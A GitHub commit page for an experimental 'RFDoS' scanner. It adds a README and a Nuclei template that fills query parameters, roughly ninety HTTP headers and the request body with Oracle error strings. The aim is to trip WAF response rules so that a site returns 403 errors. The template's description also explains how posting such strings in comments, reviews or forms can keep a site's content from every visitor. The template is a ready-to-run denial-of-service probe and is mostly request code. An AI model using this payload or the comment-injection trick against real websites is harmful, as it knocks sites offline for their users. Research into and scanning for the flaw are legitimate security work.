Skip to content

Commit f67e288

Browse files
committed
update
1 parent 35f89a9 commit f67e288

2 files changed

Lines changed: 173 additions & 0 deletions

File tree

README.md

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,31 @@
11
# RFDos-Scanner
2+
23
Response Filter Denial of Service (RFDoS) Experimental Scanner
4+
5+
> Note:
6+
This is an experiment. Don't expect to find perfect work here.
7+
8+
Read more about Response Filter Denial of Service (RFDoS) in this blog post: [Response Filter Denial of Service (RFDoS): shut down a website by triggering WAF rule](https://blog.sicuranext.com/response-filter-denial-of-service-a-new-way-to-shutdown-a-website/).
9+
10+
Get Started 🎉
11+
----------
12+
13+
```console
14+
nuclei -t rfdos.yaml -u https://target-website.com/
15+
```
16+
17+
Changelog 📌
18+
-------
19+
20+
Detailed changes for each release are documented in the [release notes](https://github.com/edoardottt/RFDos-Scanner/releases).
21+
22+
Contributing 🛠
23+
-------
24+
25+
Just open an [issue](https://github.com/edoardottt/RFDos-Scanner/issues) / [pull request](https://github.com/edoardottt/RFDos-Scanner/pulls).
26+
27+
License 📝
28+
-------
29+
30+
This repository is under [MIT License](https://github.com/edoardottt/RFDos-Scanner/blob/main/LICENSE).
31+
[edoardoottavianelli.it](https://www.edoardoottavianelli.it) to contact me.

rfdos.yaml

Lines changed: 144 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,144 @@
1+
id: RFDos
2+
3+
info:
4+
name: Response Filter Denial of Service
5+
author: edoardottt
6+
severity: high
7+
description: |
8+
Basically, if a target website is protected by a WAF using the OWASP Core Rule Set or Comodo Rule Set or Atomicorp Rule Set, you can send the string ORA-1234 or OracleDrive or ASL-CONFIG-FILE in a comment, product review, registration form, e-commerce order details, etc... to prevent the website from showing its content to any users like a Denial of Service with a minimal effort. This happens because the overly inclusive response rules of the WAF try to prevent SQL error leakage or web shells.
9+
reference:
10+
- https://blog.sicuranext.com/response-filter-denial-of-service-a-new-way-to-shutdown-a-website/
11+
classification:
12+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
13+
cvss-score: 7.5
14+
tags: rfdos
15+
16+
variables:
17+
payload: "ORA-1234:;Dynamic+SQL+Error;OracleDrive"
18+
hpayload: "ORA-1234: Dynamic SQL Error OracleDrive"
19+
20+
http:
21+
- raw:
22+
- |
23+
GET / HTTP/1.1
24+
Host: {{Hostname}}
25+
26+
- raw:
27+
- |
28+
GET /?s={{payload}}&next={{payload}}&img={{payload}}&filename={{payload}}&access={{payload}}&remote_url={{payload}}&file={{payload}}&dest={{payload}}&redirect={{payload}}&uri={{payload}}&path={{payload}}&continue={{payload}}&data={{payload}}&reference={{payload}}&site={{payload}}&open={{payload}}&nav={{payload}}&to={{payload}}&validate={{payload}}&domain={{payload}}&callback={{payload}}&image={{payload}}&file_url={{payload}}&resource={{payload}}&content={{payload}}&window={{payload}}&reference={{payload}}&site={{payload}}&html={{payload}}&val={{payload}}&domain={{payload}}&return={{payload}}&page={{payload}}&feed={{payload}}&port={{payload}}&out={{payload}}&view={{payload}}&dir={{payload}} HTTP/1.1
29+
Host: {{Hostname}}
30+
Accept: {{hpayload}}
31+
Accept-Charset: {{hpayload}}
32+
Accept-Datetime: {{hpayload}}
33+
Accept-Encoding: {{hpayload}}
34+
Accept-Language: {{hpayload}}
35+
Alt-Svc: {{hpayload}}
36+
Authorization: {{hpayload}}
37+
Base-Url: {{hpayload}}
38+
CF-Connecting-IP: {{hpayload}}
39+
Cache-Control: {{hpayload}}
40+
Client-IP: {{hpayload}}
41+
Cluster: {{hpayload}}
42+
Cluster-Client-IP: {{hpayload}}
43+
Connection: {{hpayload}}
44+
Contact: {{hpayload}}
45+
Content-Length: {{hpayload}}
46+
Content-MD5: {{hpayload}}
47+
Content-Type: {{hpayload}}
48+
Cookie: {{hpayload}}
49+
DNT: {{hpayload}}
50+
Date: {{hpayload}}
51+
Destination: {{hpayload}}
52+
Expect: {{hpayload}}
53+
Forwarded: {{hpayload}}
54+
From: {{hpayload}}
55+
Front-End-Https: {{hpayload}}
56+
HTTP_CLIENT_IP: {{hpayload}}
57+
HTTP_FORWARDED: {{hpayload}}
58+
HTTP_FORWARDED_FOR: {{hpayload}}
59+
HTTP_X_FORWARDED: {{hpayload}}
60+
HTTP_X_FORWARDED_FOR: {{hpayload}}
61+
Host: {{hpayload}}
62+
Http-Url: {{hpayload}}
63+
If-Match: {{hpayload}}
64+
If-Modified-Since: {{hpayload}}
65+
If-None-Match: {{hpayload}}
66+
If-Range: {{hpayload}}
67+
If-Unmodified-Since: {{hpayload}}
68+
Link: {{hpayload}}
69+
Location: {{hpayload}}
70+
Max-Forwards: {{hpayload}}
71+
Origin: {{hpayload}}
72+
Pragma: {{hpayload}}
73+
Profile: {{hpayload}}
74+
Proxy: {{hpayload}}
75+
Proxy-Authorization: {{hpayload}}
76+
Proxy-Connection: {{hpayload}}
77+
Proxy-Host: {{hpayload}}
78+
Proxy-Url: {{hpayload}}
79+
Range: {{hpayload}}
80+
Real-IP: {{hpayload}}
81+
Redirect: {{hpayload}}
82+
Referer: {{hpayload}}
83+
Referrer: {{hpayload}}
84+
Refferer: {{hpayload}}
85+
Request-Uri: {{hpayload}}
86+
TE: {{hpayload}}
87+
True-Client-IP: {{hpayload}}
88+
UID: {{hpayload}}
89+
Upgrade: {{hpayload}}
90+
Uri: {{hpayload}}
91+
User-Agent: {{hpayload}}
92+
Via: {{hpayload}}
93+
Warning: {{hpayload}}
94+
X-ATT-DeviceId: {{hpayload}}
95+
X-Arbitrary: {{hpayload}}
96+
X-CSRFToken: {{hpayload}}
97+
X-Client-IP: {{hpayload}}
98+
X-Cluster-Client-IP: {{hpayload}}
99+
X-Correlation-ID: {{hpayload}}
100+
X-Csrf-Token: {{hpayload}}
101+
X-Custom-IP-Authorization: {{hpayload}}
102+
X-Do-Not-Track: {{hpayload}}
103+
X-Forward-For: {{hpayload}}
104+
X-Forwarded: {{hpayload}}
105+
X-Forwarded-By: {{hpayload}}
106+
X-Forwarded-For: {{hpayload}}
107+
X-Forwarded-For-IP: {{hpayload}}
108+
X-Forwarded-For-Original: {{hpayload}}
109+
X-Forwarded-Host: {{hpayload}}
110+
X-Forwarded-Proto: {{hpayload}}
111+
X-Forwarded-Server: {{hpayload}}
112+
X-Forwarder-For: {{hpayload}}
113+
X-Host: {{hpayload}}
114+
X-Http-Destinationurl: {{hpayload}}
115+
X-Http-Host-Override: {{hpayload}}
116+
X-Http-Method-Override: {{hpayload}}
117+
X-Original-Remote-Addr: {{hpayload}}
118+
X-Original-Url: {{hpayload}}
119+
X-Originating-IP: {{hpayload}}
120+
X-Proxy-Url: {{hpayload}}
121+
X-ProxyUser-IP: {{hpayload}}
122+
X-Real-IP: {{hpayload}}
123+
X-Remote-Addr: {{hpayload}}
124+
X-Remote-IP: {{hpayload}}
125+
X-Request-ID: {{hpayload}}
126+
X-Requested-With: {{hpayload}}
127+
X-Rewrite-Url: {{hpayload}}
128+
X-True-IP: {{hpayload}}
129+
X-UIDH: {{hpayload}}
130+
X-Wap-Profile: {{hpayload}}
131+
X-XSRF-TOKEN: {{hpayload}}
132+
133+
{{hpayload}}
134+
135+
136+
redirects: true
137+
max-redirects: 5
138+
139+
matchers:
140+
- type: dsl
141+
dsl:
142+
- "status_code_1==200 || status_code_1==201 || status_code_1==202 || status_code_1==203 || status_code_1==204 || status_code_1==205 || status_code_1==206"
143+
- "status_code_2 == 403"
144+
condition: and

0 commit comments

Comments
 (0)